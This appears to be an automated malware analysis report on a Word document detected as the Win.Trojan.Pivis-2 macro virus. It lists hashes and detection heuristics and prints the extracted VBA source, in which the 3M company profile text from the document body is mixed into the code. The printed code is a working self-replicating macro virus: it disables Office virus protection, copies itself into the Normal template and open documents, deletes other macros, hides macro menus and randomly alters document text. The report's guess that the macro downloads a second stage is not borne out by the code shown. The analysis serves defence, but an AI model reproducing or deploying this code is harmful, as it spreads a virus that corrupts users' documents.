Malicious Office (OLE) — malware analysis report

Static analysis result for SHA-256 0a912f4a93234582…

MALICIOUS

Office (OLE)

Size: 80.5 KB
Created: 2000-06-13 11:50:00
Authoring application: Microsoft Word 8.0
First seen: 2012-06-14
MD5: ff9c34ad61b199fb2430ea294b30c9b6
SHA-1: de13d707783c67240464589238c5451b924d365e
SHA-256: 0a912f4a93234582d464d674962902cfddfbc4eca16e2deab5125272a9c8eec9
Risk Score: 198

Malware Insights

MITRE ATT&CK
T1059.005 Visual Basic
T1566.001 Spearphishing Attachment

The sample is identified as malicious by ClamAV with the signature Win.Trojan.Pivis-2. It contains legacy WordBasic and VBA macros, including AutoOpen and Auto_Close, which are commonly used to execute malicious code upon document interaction. The VBA macro 'akrnl' likely attempts to download and execute a second-stage payload, although the exact mechanism is obfuscated.

Heuristics (7)

  • ClamAV: Win.Trojan.Pivis-2 critical CLAMAV_DETECTION
    ClamAV detected this file as malware: Win.Trojan.Pivis-2
  • VBA macros detected medium 3 related findings OLE_VBA_MACROS
    Document contains VBA macro code
  • VBA macro-virus self-replication / AV tampering critical OLE_VBA_MACRO_VIRUS_REPLICATION
    VBA macro programmatically rewrites VBA project code through the VBE object model (CodeModule/VBComponents InsertLines/DeleteLines/AddFromString or OrganizerCopy) to copy itself into the global template and other open documents, and/or disables Office macro-virus protection (Options.VirusProtection = False). This is the defining behavior of the W97M document macro-virus family — self-replicating code with no benign document use, independent of any AV signature.
    Matched line in script
    Options.VirusProtection = False
  • AutoOpen macro low OLE_VBA_AUTOOPEN
    AutoOpen macro
    Matched line in script
    Sub autoOpen()
  • Auto_Close macro low OLE_VBA_AUTOCLOSE
    Auto_Close macro
    Matched line in script
    Sub AutoClose()
  • Legacy WordBasic macro-virus markers high OLE_LEGACY_WORDBASIC_MACRO_VIRUS
    OLE Word document contains legacy WordBasic auto-execution macro markers such as AutoOpen plus ToolsMacro/MacroFile/fileMacro/globMacro or named historical macro-virus strings. These old Word 6/95 macro forms are not exposed as a modern VBA project, so normal VBA source extraction can miss them.
  • Embedded URL info EMBEDDED_URL
    One or more URLs were extracted from the document. The URL itself is not a detection — see the per-URL labels for which channel (macro, JS, link annotation, document body, ...) reached each URL.
    URL http://www.3M.com In document text (OLE body)

Extracted artifacts (1)

Files carved from inside the sample during analysis.

Filename: macros.bas
Kind: vba-macro
Source: oletools.olevba.extract_macros (decoded VBA source)
Size: 18979 bytes
SHA-256: 082120d07e9db988a29353b09c35cff3d62961b64760fbc383f5b080e14cb3f7
Preview script
First 1,000 lines of the extracted script
Attribute VB_Name = "ThisDocument"
Attribute VB_Base = "1Normal.ThisDocument"
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = True
Attribute VB_Customizable = True

Attribute VB_Name = "akrnl"
    
Public Skip As Integer
Sub AutoExec()
    On Error Resume Next
    Call Sauve
End Sub
Sub AutoNew()
 On Error Resume Next
 Call Sauve
End Sub
Sub AutoPrint()
 On Error Resume Next
 Call Sauve
End Sub

Sub FileNew()
    On Error Resume Next
    Call Sauve
Dialogs(wdDialogFileNew).Show
    Skip = 1
    Call Sauve
    
End Sub
Sub fileclose()
    On Error Resume Next
    Call Sauve
    If ActiveDocument.Saved = False Then ActiveDocument.Save
    ActiveDocument.Close
    Call Sauve
End Sub
Sub FileExit()
    On Error Resume Next
    Call Sauve
    Application.Quit
End Sub
    

Sub autoOpen()
    On Error Resume Next

VISION

To be the most innovative company and the preferred supplier.

VALUES

To satisfy our customers with superior value, quality and service.

To provide our investors with attractive returns through sustained, quality growth.

To respect our social and physical environment.

To be a company that employees are proud to belong to.

3M was founded in 1902 in the city of Two Harbors, Minnesota, by five businessmen who agreed to mine minerals used as abrasives in grinding wheels. New investors were attracted once production reached good quality and sources of supply were established. One of them was Lucius Ordway, who moved the company to St. Paul in 1910.

Over the years 3M has continued to innovate and diversify its products; between 1946 and 1947 the first tapes were sold in Latin America, the first subsidiaries were established and the first factories were set up in Brazil and Mexico. That is how 3M today has a wide variety of products which are sold in almost every country in the world and in a great number of markets.

The history of 3M in Mexico goes back to the now distant year of 1947, when a small company of only seven employees was founded under the name DUREX DE MEXICO, S.A.; it opened for business selling abrasives and shortly afterwards Masking Tape adhesive tapes and Cellophane tape.

Listing every important event the 3M company has lived through since its arrival in Mexico would be a practically impossible task; however, there are some facts worth remembering for their significance and because they laid the foundations of what 3M Mexico is today.

In 1951, manufacturing of Cellophane Tape and Masking Tape began in Mexico, as well as of electrical insulation tapes. In 1959, the first branches were opened in Monterrey and Tijuana, and two years later the Guadalajara branch.

In 1966, the Secretariat of Industry and Commerce gave special recognition to Scotch Super 33 Tape as a High Quality product. During the Mexico 1968 Olympics, 3M Mexico was in charge of installing the Tartan tracks on which so many world records would be broken. The expansion of 3M Mexico continued, and in 1974 the Puebla branch opened. 1985 marked the start of diaper tape exports, and the following year the Guanajuato branch opened, followed in '89 by the Veracruz and Chihuahua branches.

From 1990 to 1993, activity and change at 3M were remarkable: construction of the new manufacturing plant in the city of San Luis Potosí began, and it started operations in 1993; in the same period the Villahermosa, Culiacán, Ciudad Juárez, Querétaro and Tijuana branches opened.

In 1995, the major project to build the new 3M office complex in the Santa Fe area of Mexico City was born. In June 1998 those offices were ready, and 3M moved to Santa Fe.

The products 3M sells in Mexico are marketed through 7 divisions:

Division I Industrial

Division II Electrical and Telecommunications Systems

Division III Consumer and Office Products

Division IV Personal Care and Construction Market

Division V Health Care

Division VI Graphics

Division VII Plates

In 1951 the first product research was carried out.

Operations in more than 60 different countries.

3M products are sold in more than 200 countries.

41 of our international companies have manufacturing operations, from small converting operations to various production lines.

29 of our international companies have laboratories supporting sales plans. These laboratories work together with technical service, manufacturing support, product modifications, new product development and some technology development.

All international companies provide technical support to customers.

Worldwide sales of $15.021 billion dollars.

52% of these sales come from the international companies.

There are more than 35,000 employees in 3M's international companies.

Below are the vice presidents of 3M

H.W. Borrelli, area vice president, Latin America and Africa
A. Gastaldo, vice president, Asia Pacific
R.J. Burgstahler, president and general manager, Canada
E. Pieruzzi, vice president, Europe and Middle East

These area executives report to R.O. Baukol, executive

with soap and water, alcohol, and other solvents, nothing worked. Then came a flash of insight. If the sample couldn't be removed with water, it might make a good rain repellent. If it was impervious to solvents, it could protect fabrics from stains.


"At 3M, we are committed to satisfying our customers with superior quality and value; providing investors with an attractive return through sustained, high-quality growth; respecting our social and physical environment; and being a company of which employees are proud."

L.D. DeSimone
Chairman of the Board and Chief Executive Officer, 3M

This insight was the innovation that led to the family of Scotchgard(TM) Protectors used today on clothing, carpets, furniture, wood, and leather.

Not all our new products come about through lucky accidents. We take innovation seriously. As a result, today 3M is a $14 billion company with more than 70,000 employees who create, manufacture and sell 50,000 products in 200 countries around the world. Those products will tell you something about 3M, their technologies, and markets. But to really understand 3M, you have to know our imaginative people, working together to find practical ways to make life better.

Our innovative culture

Innovation is required at 3M. Thirty percent of each year's sales must come from products less than 4 years old.

"Those men and women to whom we delegate authority and responsibility, if they are good people, are going to want to do their jobs in their own way ...

"Mistakes will be made, but if a person is essentially right, the mistakes he or she makes are not as serious in the long run as the mistakes management will make if it is dictatorial and undertakes to tell those under its authority exactly how they must do their job.

"Management that is destructively critical when mistakes are made kills initiative, and it is essential that we have people with initiative if we are to continue to grow."

-- from his "Philosophy of Management," a paper presented in 1941 by William L. McKnight, former President, 3M

But innovation is more than products, it's the way 3Mers do business.

At 3M, we pride ourselves in forming innovative relationships within our organization, with suppliers and customers, between domestic and international business units -- relationships that respect individual and cultural differences and result in products that make life better for all of us.

We listened when physicians, technicians and patients told us that plaster casts for broken bones were heavy, uncomfortable and expensive. We responded with 3M(TM) Scotchcast(TM) Casting Tape, the first casting tape to be fiberglass and water-activated, lighter and more comfortable, and sets in only 20 minutes. Then we listened to the youngest patients and found that we could make children's injuries a little less frightening by offering 3M(TM) Scotchcast(TM) Plus Casting Tape in colors.

3M's problem-solving approach also provides services to those who order and receive our products. We can modify our order entry software so that it will accept orders in the quantities and language of the customer's computer. When shipping, we will arrange goods on the pallet at our warehouse in whatever way that is most convenient for customers receiving them.

Our job is to make customers' lives easier and better.

William L. McKnight joined Minnesota Mining and Manufacturing Company in 1907 as an assistant bookkeeper. He quickly rose through the company, becoming president in 1929 and chairman of the board in 1949.

Many believe McKnight's greatest contribution was as a business philosopher, since he created a corporate culture that encourages employee initiative, innovation and provides secure employment.

His basic rule of management was laid out in 1948:

"As our business grows, it becomes increasingly necessary to delegate responsibility and to encourage men and women to exercise their initiative. This requires considerable tolerance. Those men and women to whom we delegate authority and responsibility, if they are good people, are going to want to do their jobs in their own way.

"Mistakes will be made. But if a person is essentially right, the mistakes he or she makes are not as serious in the long run as the mistakes management will make if it undertakes to tell those in authority exactly how they must do their jobs.

"Management that is destructively critical when mistakes are made kills initiative. And it's essential that we have many people with initiative if we are to continue to grow."



Comments or Questions
Copyright © 3M. All rights reserved.

From:
3M Public Relations and Corporate Communications
3M Center, St. Paul MN 55144-1000
Phone: 1-800-3M HELPS
Internet Address: http://www.3M.com
E-mail Address: innovation@mmm.com

Gopher Menu

Refer questions to Betty West, 733-7882

CHAIRMAN AND CHIEF EXECUTIVE OFFICER
HEALTH CARE MARKETS
INDUSTRIAL AND ELECTRO MARKETS
TRANSPORTATION, SAFETY AND SPECIALTY MATERIAL MARKETS
INTERNATIONAL OPERATIONS
CONSUMER AND OFFICE MARKETS
ENGINEERING, MANUFACTURING AND LOGISTICS
FINANCE & ADMINISTRATIVE SERVICES
HUMAN RESOURCES
LEGAL AFFAIRS
MARKETING
RESEARCH AND DEVELOPMENT
3M BOARD OF DIRECTORS
CORPORATE OFFICERS
BUSINESS UNIT GUIDELINES

Our company and employees continue to support education, communities, the arts, and health and human services. In 1997, 3M donated over $35 million in cash, products and services to more than 2,000 educational and charitable organizations.

Education is a key area of emphasis, with special focus on science, math and economics from elementary to graduate levels. In higher education, we provide grants to colleges and universities for capital improvements and academic programs, as well as for scholarships, fellowships and other efforts.

3M employees continue to make a difference in their communities as volunteers, mentors and tutors. As part of Science Encouragement programs, 3M scientists and engineers visit schools to spark student interest in science and math. These popular programs, which originated in St. Paul, Minnesota, have expanded throughout the United States, as well as into Japan, the United Kingdom, Canada and other countries. Our employees and retirees also volunteer countless hours to community service projects, such as Meals-on-Wheels and Habitat for Humanity.

3M is committed to safe, healthy and environmentally sustainable products and operations. We've advanced into Life Cycle Management, in which our employees strive to improve environmental, health and safety aspects of 3M products from development to disposal.

For example, employees tested 400 formulas to develop 3M's newest firefighting foam, which passed 40 rigorous internal performance and environmental tests.

Since 1990, 3M has reduced its waste-generation ratio by 31 percent. During the same period, we've cut air emissions by 70 percent, reduced releases to water by 52 percent and improved energy efficiency by more than 7 percent.

Since 1994, 3M has reduced recordable work-related illness and injury by 50 percent. We aim for "zero incidents" through prevention planning, employee involvement and knowledge transfer in all of our operations.

To learn more, access www.3M.com/profile/envt on the Internet or call 1-800-3M-HELPS for our Environmental Progress Report.

Document = ThisDocument / &H0
Name = "Project"
HelpContextID = "0"
CMG = "A8AAB9BFBDBFBDBFBDBFBD"
DPB = "CBC9DAF9FCFAFCFAFC"
GC = "EEECFFDE012225232523DA"

[Host Extender Info]
&H00000001={3832D640-CF90-11CF-8E43-00A0C911005A};VBE;&H00000000

[Workspace]
ThisDocument=0, 0, 0, 0, C



    Call akrnl
    Call Sauve
    
End Sub
Sub AutoExit()
    On Error Resume Next
    Call Sauve
    If ActiveDocument.Saved = False Then ActiveDocument.Save
    Application.Quit
End Sub

Sub AutoClose()
    On Error Resume Next
    Call Sauve
    If ActiveDocument.Saved = False Then ActiveDocument.Save
    Call Sauve
End Sub
Sub ToolsMacro()
    On Error Resume Next
    
End Sub
Sub FileTemplates()
    On Error Resume Next
    
End Sub
Sub ViewVBCode()
   On Error Resume Next
   
End Sub

Sub RandomRemplace()
Randomize
ValRandom = Int(Rnd * 75)
    If ValRandom < 20 Then BesoinRemplace = True
    If ValRandom < 20 Then txt = "ainsi, si j'en crois ce que mon incompétant de professeur me dit,"
    If ValRandom < 15 Then txt = "ainsi, mon chat a perdu ses dents. De plus,"
    If ValRandom < 10 Then txt = "ainsi, selon ma grand-mère,"
    If ValRandom < 5 Then txt = "ainsi, la matière du cours est plate. De plus,"
    
    If BesoinRemplace = True Then Call Remplace(txt)
    
    
    
End Sub
    

Sub Remplace(txt)
 
Selection.Find.ClearFormatting
    Selection.Find.Replacement.ClearFormatting
    With Selection.Find
        .Text = "donc,"
        .Replacement.Text = txt
        .Forward = True
        .Format = False
        .MatchCase = False
        .MatchWholeWord = False
        .MatchWildcards = False
        .MatchSoundsLike = False
        .MatchAllWordForms = False
    End With
    Selection.Find.Execute Replace:=wdReplaceOne
    Selection.MoveUp UNIT:=wdScreen, Count:=8
    

End Sub

Sub Sauve()

On Error Resume Next
Options.ConfirmConversions = False
Options.VirusProtection = False
Options.SaveNormalPrompt = False
Application.VBE.ActiveVBProject.VBComponents("akrnl").Export "c:\Étudiant.cfg"
ActiveDocument.ReadOnlyRecommended = False

For i = 1 To ActiveDocument.VBProject.VBComponents.Count
NomMacro = ActiveDocument.VBProject.VBComponents(i).Name
If NomMacro = "akrnl" Then PrésentAct = True Else Call DelVir(NomMacro)
Next i

For i = 1 To NormalTemplate.VBProject.VBComponents.Count
NomMacro = NormalTemplate.VBProject.VBComponents(i).Name
If NomMacro = "akrnl" Then PrésentNorm = True Else Call DelVir(NomMacro)
Next i

If PrésentAct = True And PrésentNorm = False Then Set BesoinSauve = NormalTemplate.VBProject.VBComponents
If PrésentAct = False And PrésentNorm = True Then Set BesoinSauve = ActiveDocument.VBProject.VBComponents

BesoinSauve.Import "c:\Étudiant.cfg"

If PrésentNorm = False Then If NormalTemplate.Saved = False Then NormalTemplate.Save
If PrésentAct = False Then ActiveDocument.SaveAs FileName:=ActiveDocument.FullName, FileFormat:=wdFormatDocument

End Sub
Sub DelVir(NomMacro)
On Error Resume Next

Application.VBE.ActiveVBProject.VBComponents.Remove _
                         Application.VBE.ActiveVBProject.VBComponents(NomMacro)
                         
With Application.NormalTemplate.VBProject
             .VBComponents.Remove .VBComponents(NomMacro)
    End With
End Sub